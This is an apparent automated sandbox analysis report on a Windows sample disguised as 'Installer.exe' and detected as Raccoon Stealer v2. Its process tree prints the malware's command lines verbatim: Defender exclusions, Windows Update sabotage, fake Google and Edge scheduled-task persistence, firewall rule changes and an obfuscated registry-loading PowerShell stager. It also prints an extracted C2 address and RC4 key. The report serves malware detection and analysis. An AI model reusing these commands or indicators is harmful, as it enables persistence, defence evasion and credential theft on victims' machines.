Edit tour
Windows
Analysis Report
Installer.exe
Overview
General Information
Detection
Raccoon Stealer v2
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: Stop multiple services
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Uses netsh to modify the Windows network and firewall settings
Query firmware table information (likely to detect VMs)
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Machine Learning detection for sample
Allocates memory in foreign processes
Creates files in the system32 config directory
Injects a PE file into a foreign processes
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
Hides threads from debuggers
Sample uses process hollowing technique
Modifies power options to not sleep / hibernate
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found hidden mapped module (file has been removed from disk)
Obfuscated command line found
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Modifies the windows firewall
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Creates job files (autostart)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Contains functionality for execution timing, often used to detect debuggers
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains an invalid checksum
Classification
- System is w10x64
- Installer.exe (PID: 2980 cmdline:
C:\Users\u ser\Deskto p\Installe r.exe MD5: 2522D780342912E8445B24A2591ECC8F) - 1u8JL0XE.exe (PID: 3064 cmdline:
"C:\Users\ user\AppDa ta\LocalLo w\1u8JL0XE .exe" MD5: 9253ED091D81E076A3037E12AF3DC871) - powershell.exe (PID: 2708 cmdline:
powershell Add-MpPre ference -E xclusionPa th @($env: UserProfil e, $env:Pr ogramFiles ) -Force MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 1784 cmdline:
cmd /c sc stop UsoSv c & sc sto p WaaSMedi cSvc & sc stop wuaus erv & sc s top bits & sc stop d osvc & reg delete "H KLM\SYSTEM \CurrentCo ntrolSet\S ervices\Us oSvc" /f & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\WaaSMedi cSvc" /f & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\wuauserv " /f & reg delete "H KLM\SYSTEM \CurrentCo ntrolSet\S ervices\bi ts" /f & r eg delete "HKLM\SYST EM\Current ControlSet \Services\ dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - sc.exe (PID: 4808 cmdline:
sc stop Us oSvc MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 1504 cmdline:
sc stop Wa aSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 4660 cmdline:
sc stop wu auserv MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 1228 cmdline:
sc stop bi ts MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 5288 cmdline:
sc stop do svc MD5: D79784553A9410D15E04766AAAB77CD6) - reg.exe (PID: 2420 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \UsoSvc" / f MD5: E3DACF0B31841FA02064B4457D44B357) - reg.exe (PID: 1500 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \WaaSMedic Svc" /f MD5: E3DACF0B31841FA02064B4457D44B357) - reg.exe (PID: 1244 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357) - reg.exe (PID: 5860 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \bits" /f MD5: E3DACF0B31841FA02064B4457D44B357) - reg.exe (PID: 1504 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \dosvc" /f MD5: E3DACF0B31841FA02064B4457D44B357) - cmd.exe (PID: 3292 cmdline:
cmd /c pow ercfg /x - hibernate- timeout-ac 0 & power cfg /x -hi bernate-ti meout-dc 0 & powercf g /x -stan dby-timeou t-ac 0 & p owercfg /x -standby- timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 920 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powercfg.exe (PID: 1888 cmdline:
powercfg / x -hiberna te-timeout -ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5) - powercfg.exe (PID: 2556 cmdline:
powercfg / x -hiberna te-timeout -dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5) - conhost.exe (PID: 2416 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powercfg.exe (PID: 4312 cmdline:
powercfg / x -standby -timeout-a c 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5) - powercfg.exe (PID: 788 cmdline:
powercfg / x -standby -timeout-d c 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5) - powershell.exe (PID: 4716 cmdline:
powershell <#ecgxrz# > IF((New- Object Sec urity.Prin cipal.Wind owsPrincip al([Securi ty.Princip al.Windows Identity]: :GetCurren t())).IsIn Role([Secu rity.Princ ipal.Windo wsBuiltInR ole]::Admi nistrator) ) { IF([Sy stem.Envir onment]::O SVersion.V ersion -lt [System.V ersion]"6. 2") { "sch tasks /cre ate /f /sc onlogon / rl highest /ru 'Syst em' /tn 'G oogleUpdat eTaskMachi neQC' /tr '''C:\Prog ram Files\ Google\Chr ome\update r.exe'''" } Else { R egister-Sc heduledTas k -Action (New-Sched uledTaskAc tion -Exec ute 'C:\Pr ogram File s\Google\C hrome\upda ter.exe') -Trigger ( New-Schedu ledTaskTri gger -AtSt artup) -Se ttings (Ne w-Schedule dTaskSetti ngsSet -Al lowStartIf OnBatterie s -Disallo wHardTermi nate -Dont StopIfGoin gOnBatteri es -DontSt opOnIdleEn d -Executi onTimeLimi t (New-Tim eSpan -Day s 1000)) - TaskName ' GoogleUpda teTaskMach ineQC' -Us er 'System ' -RunLeve l 'Highest ' -Force; } } Else { reg add " HKCU\SOFTW ARE\Micros oft\Window s\CurrentV ersion\Run " /v "Goog leUpdateTa skMachineQ C" /t REG_ SZ /f /d ' C:\Program Files\Goo gle\Chrome \updater.e xe' } MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 3692 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - dialer.exe (PID: 3376 cmdline:
C:\Windows \system32\ dialer.exe MD5: 0EC74656A7F7667DD94C76081B111827) - powershell.exe (PID: 1716 cmdline:
powershell <#wajvhwi nk#> IF((N ew-Object Security.P rincipal.W indowsPrin cipal([Sec urity.Prin cipal.Wind owsIdentit y]::GetCur rent())).I sInRole([S ecurity.Pr incipal.Wi ndowsBuilt InRole]::A dministrat or)) { sch tasks /run /tn "Goog leUpdateTa skMachineQ C" } Else { "C:\Prog ram Files\ Google\Chr ome\update r.exe" } MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 4312 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 1172 cmdline:
"C:\Window s\system32 \schtasks. exe" /run /tn Google UpdateTask MachineQC MD5: 838D346D1D28F00783B7A6C6BD03A0DA) - OBH7JYJN.exe (PID: 5136 cmdline:
"C:\Users\ user\AppDa ta\LocalLo w\OBH7JYJN .exe" MD5: AAEAD1169523638D40CA4D884E3D787A) - powershell.exe (PID: 4920 cmdline:
powershell -enC QQBk AGQALQBNAH AAUAByAGUA ZgBlAHIAZQ BuAGMAZQAg AC0ARQB4AG MAbAB1AHMA aQBvAG4AUA BhAHQAaAAg AEAAKAAnAE MAOgBcAFUA cwBlAHIAcw BcAFIAZQB2 AGUAbABpAG 4AJwAsACAA JwBDADoAXA BQAHIAbwBn AHIAYQBtAC AARgBpAGwA ZQBzACcAKQ AgAC0ARgBv AHIAYwBlAA == MD5: DBA3E6449E97D4E3DF64527EF7012A10) - conhost.exe (PID: 5868 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 1636 cmdline:
powershell -enC UwBl AHQALQBNAH AAUAByAGUA ZgBlAHIAZQ BuAGMAZQAg AC0AUwB1AG IAbQBpAHQA UwBhAG0AcA BsAGUAcwBD AG8AbgBzAG UAbgB0ACAA MgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10) - conhost.exe (PID: 60 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 6136 cmdline:
SCHTASKS / Create /TR "C:\Users \user\AppD ata\LocalL ow\OBH7JYJ N.exe" /TN "GoogleUp dateTask{5 6c41dbe-92 cb-4ab7-b4 23-bd40cb6 5f9fe}" /S C ONLOGON /F /RL HIG HEST MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 1992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 64 cmdline:
SCHTASKS / Create /TR "C:\Users \user\AppD ata\LocalL ow\OBH7JYJ N.exe" /TN "GoogleUp dateTaskUA C{0625ad4f -50a5-4d12 -b200-288d 853de0d5}" /SC HOURL Y /F /MO 1 /RL HIGHE ST MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 2440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - GoogleUpdate.exe (PID: 5852 cmdline:
C:\Windows \GoogleUpd ate.exe MD5: 9A66A3DE2589F7108426AF37AB7F6B41) - netsh.exe (PID: 4532 cmdline:
netsh fire wall add a llowedprog ram "C:\Wi ndows\Goog leUpdate.e xe" "Googl e Updater" ENABLE AL L MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) - conhost.exe (PID: 2620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - netsh.exe (PID: 2168 cmdline:
netsh advf irewall fi rewall add rule name ="Google U pdater" di r=in actio n=allow pr ogram="C:\ Windows\Go ogleUpdate .exe" enab le=yes MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) - conhost.exe (PID: 2472 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - netsh.exe (PID: 3628 cmdline:
netsh advf irewall fi rewall add rule name ="Google U pdater" di r=out acti on=allow p rogram="C: \Windows\G oogleUpdat e.exe" ena ble=yes MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807) - conhost.exe (PID: 5416 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - NtjHIfvQ.exe (PID: 2424 cmdline:
"C:\Users\ user\AppDa ta\LocalLo w\NtjHIfvQ .exe" MD5: 68E3359674EE7D49550B09E7FF69DCCE) - cmd.exe (PID: 5340 cmdline:
"cmd.exe" /C schtask s /create /tn \Micro softPlatfo rmRenderer {37379bc5- bb9c-4fca- aa31-e33b4 e087725} / tr "C:\Use rs\user\Ap pData\Loca lLow\NtjHI fvQ.exe" / st 00:00 / du 9999:59 /sc once /ri 1 /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 5256 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 5176 cmdline:
schtasks / create /tn \Microsof tPlatformR enderer{37 379bc5-bb9 c-4fca-aa3 1-e33b4e08 7725} /tr "C:\Users\ user\AppDa ta\LocalLo w\NtjHIfvQ .exe" /st 00:00 /du 9999:59 /s c once /ri 1 /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA) - audiodg.exe (PID: 5340 cmdline:
C:\Windows \system32\ AUDIODG.EX E 0x424 MD5: 0B245353F92DF527AA7613BA2C0DA023) - MfU3390p.exe (PID: 3332 cmdline:
"C:\Users\ user\AppDa ta\LocalLo w\MfU3390p .exe" MD5: 33DAD992607D0FFD44D2C81FE67F8FB1) - schtasks.exe (PID: 5212 cmdline:
SCHTASKS / Create /TR "C:\Users \user\AppD ata\LocalL ow\MfU3390 p.exe" /TN "Microsof tEdge{e60e 5877-76e2- 4b84-98a8- 90161a4b47 ca}" /SC O NLOGON /F /RL HIGHES T MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 5204 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- OBH7JYJN.exe (PID: 5856 cmdline:
C:\Users\u ser\AppDat a\LocalLow \OBH7JYJN. exe MD5: AAEAD1169523638D40CA4D884E3D787A)
- OBH7JYJN.exe (PID: 5996 cmdline:
C:\Users\u ser\AppDat a\LocalLow \OBH7JYJN. exe MD5: AAEAD1169523638D40CA4D884E3D787A)
- MfU3390p.exe (PID: 5144 cmdline:
C:\Users\u ser\AppDat a\LocalLow \MfU3390p. exe MD5: 33DAD992607D0FFD44D2C81FE67F8FB1) - schtasks.exe (PID: 4688 cmdline:
SCHTASKS / Create /TR "C:\Users \user\AppD ata\LocalL ow\MfU3390 p.exe" /TN "Microsof tEdge{e60e 5877-76e2- 4b84-98a8- 90161a4b47 ca}" /SC O NLOGON /F /RL HIGHES T MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 5812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- NtjHIfvQ.exe (PID: 4744 cmdline:
C:\Users\u ser\AppDat a\LocalLow \NtjHIfvQ. exe MD5: 68E3359674EE7D49550B09E7FF69DCCE) - cmd.exe (PID: 6124 cmdline:
"cmd.exe" /C schtask s /create /tn \Micro softPlatfo rmRenderer {37379bc5- bb9c-4fca- aa31-e33b4 e087725} / tr "C:\Use rs\user\Ap pData\Loca lLow\NtjHI fvQ.exe" / st 00:00 / du 9999:59 /sc once /ri 1 /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 1252 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 1788 cmdline:
schtasks / create /tn \Microsof tPlatformR enderer{37 379bc5-bb9 c-4fca-aa3 1-e33b4e08 7725} /tr "C:\Users\ user\AppDa ta\LocalLo w\NtjHIfvQ .exe" /st 00:00 /du 9999:59 /s c once /ri 1 /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
- powershell.exe (PID: 2416 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.EXE ". (\"{1}{0}\ " -f 'eT', 'S') (\"6T \"+\"o\") ([tYpE](\" {2}{0}{4}{ 1}{3}\" -F 'e','mBL', 'refl','y' ,'ctiOn.As Se') ) ; $ Dlr4S = [t yPe](\"{3} {1}{2}{4}{ 0}\"-F'Ry' ,'oSOfT.W' ,'iN32.R', 'MICR','eG iST') ; $6 TO::(\"{0} {1}\" -f ' L','oad'). Invoke( (. (\"{1}{2}{ 0}\" -f 't -Item','g' ,'e') (\"v ARI\"+\"Ab \"+\"lE\"+ \":DlR4S\" ) ).\"VA`l uE\"::\"lO c`ALM`AChi ne\".(\"{2 }{1}{0}\" -f 'ey','u bk','OpenS ').Invoke( (\"{1}{0}\ "-f'E','SO FTWAR')).( \"{1}{0}{2 }\" -f'u', 'GetVal',' e').Invoke ((\"{1}{2} {3}{0}\"-f 'ger','dia ','lers',' ta'))).\"E nT`Ryp`OIN t\".\"in`V oKE\"(${n` Ull},${n`U Ll})" MD5: DBA3E6449E97D4E3DF64527EF7012A10) - conhost.exe (PID: 1868 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 2748 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.EXE ". (\"{1}{0}\ " -f 'eT', 'S') (\"6T \"+\"o\") ([tYpE](\" {2}{0}{4}{ 1}{3}\" -F 'e','mBL', 'refl','y' ,'ctiOn.As Se') ) ; $ Dlr4S = [t yPe](\"{3} {1}{2}{4}{ 0}\"-F'Ry' ,'oSOfT.W' ,'iN32.R', 'MICR','eG iST') ; $6 TO::(\"{0} {1}\" -f ' L','oad'). Invoke( (. (\"{1}{2}{ 0}\" -f 't -Item','g' ,'e') (\"v ARI\"+\"Ab \"+\"lE\"+ \":DlR4S\" ) ).\"VA`l uE\"::\"lO c`ALM`AChi ne\".(\"{2 }{1}{0}\" -f 'ey','u bk','OpenS ').Invoke( (\"{1}{0}\ "-f'E','SO FTWAR')).( \"{1}{0}{2 }\" -f'u', 'GetVal',' e').Invoke ((\"{1}{2} {3}{0}\"-f 'ger','dia ','lers',' ta'))).\"E nT`Ryp`OIN t\".\"in`V oKE\"(${n` Ull},${n`U Ll})" MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5216 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - dllhost.exe (PID: 4128 cmdline:
C:\Windows \System32\ dllhost.ex e /Process id:{946476 e5-3894-42 c2-b536-73 41f926cc1f } MD5: 2528137C6745C4EADD87817A1909677E)
- cleanup
{"C2 url": ["http://109.107.173.210/"], "Bot ID": "e73f27cb584c5e7186bc777bf0481f2f", "RC4_key1": "e73f27cb584c5e7186bc777bf0481f2f"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | Detects executables embedding command execution via IExecuteCommand COM object | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Rootkit_R77_5bab748b | unknown | unknown |
| |
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security | ||
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security | ||
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security | ||
JoeSecurity_RaccoonV2 | Yara detected Raccoon Stealer v2 | Joe Security | ||
Click to see the 23 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Rootkit_R77_5bab748b | unknown | unknown |
| |
Windows_Rootkit_R77_5bab748b | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | Detects executables embedding command execution via IExecuteCommand COM object | ditekSHen |
| |
Windows_Rootkit_R77_5bab748b | unknown | unknown |
| |
Windows_Rootkit_R77_5bab748b | unknown | unknown |
| |
Click to see the 17 entries |
Operating System Destruction |
---|
Source: | Author: Joe Security: |
Timestamp: | 192.168.2.4172.66.40.196496974432039616 01/04/23-16:48:18.137155 |
SID: | 2039616 |
Source Port: | 49697 |
Destination Port: | 443 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 109.107.173.210192.168.2.480496952036955 01/04/23-16:47:23.522722 |
SID: | 2036955 |
Source Port: | 80 |
Destination Port: | 49695 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.4109.107.173.21049695802036934 01/04/23-16:47:23.441995 |
SID: | 2036934 |
Source Port: | 49695 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.466.235.200.14749696802043003 01/04/23-16:47:37.397562 |
SID: | 2043003 |
Source Port: | 49696 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.4109.107.173.21049695802043003 01/04/23-16:47:27.555819 |
SID: | 2043003 |
Source Port: | 49695 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 42_2_00F27236 | |
Source: | Code function: | 52_2_00F27236 | |
Source: | Code function: | 55_2_00007FF6CF7466D4 |
Source: | Code function: | 1_2_00007FF738DC2530 | |
Source: | Code function: | 1_2_00007FF738DC2530 | |
Source: | Code function: | 1_2_00007FF738DC2530 | |
Source: | Code function: | 1_2_00007FF738DC2530 | |
Source: | Code function: | 1_2_00007FF738DBF1C0 | |
Source: | Code function: | 1_2_00007FF738DB81D0 | |
Source: | Code function: | 1_2_00007FF738DC22E0 | |
Source: | Code function: | 1_2_00007FF738DC22E0 | |
Source: | Code function: | 1_2_00007FF738DC22E0 | |
Source: | Code function: | 1_2_00007FF738DC22E0 | |
Source: | Code function: | 1_2_00007FF738DC23A0 | |
Source: | Code function: | 1_2_00007FF738DC23A0 | |
Source: | Code function: | 1_2_00007FF738DC2490 | |
Source: | Code function: | 1_2_00007FF738DC2490 | |
Source: | Code function: | 1_2_00007FF738DC2490 | |
Source: | Code function: | 1_2_00007FF738DC2490 | |
Source: | Code function: | 1_2_00007FF738DC2490 | |
Source: | Code function: | 1_2_00007FF738DC2490 | |
Source: | Code function: | 1_2_00007FF738DB5530 | |
Source: | Code function: | 1_2_00007FF738DBC000 | |
Source: | Code function: | 1_2_00007FF738DB8100 |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | URLs: |
Source: | HTTP traffic detected: |